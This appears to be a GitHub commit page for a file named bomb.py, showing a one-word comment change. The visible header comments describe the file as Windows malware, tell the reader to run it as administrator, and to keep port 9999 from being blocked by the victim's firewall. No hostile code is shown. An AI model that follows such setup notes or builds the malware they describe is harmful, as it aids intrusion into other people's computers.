Skip to content

Commit c2111f2

Browse files
authored
Update bomb.py
1 parent bf98cbf commit c2111f2

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

src/bomb.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,6 +1,6 @@
11
# MADE FOR WINDOWS | MALWARE, USE RESPONSIBLY!
22
# PLEASE EXECUTE THIS CODE WITH ADMINISTRATOR!
3-
# MAKE SURE TO CHECK PORT: 9999 DOESN'T GET BLOCKED BY THE USERS FIREWALL!
3+
# MAKE SURE TO CHECK PORT "9999" DOESN'T GET BLOCKED BY THE USERS FIREWALL!
44
import os
55
from os import system
66
# os.system('pip install tkinter') | install `tkinter`, but its a built-in Python module. it doesn't need to be installed using `pip`. In fact, trying to install it using `pip` will likely fail. But its here just incase

0 commit comments

Comments
 (0)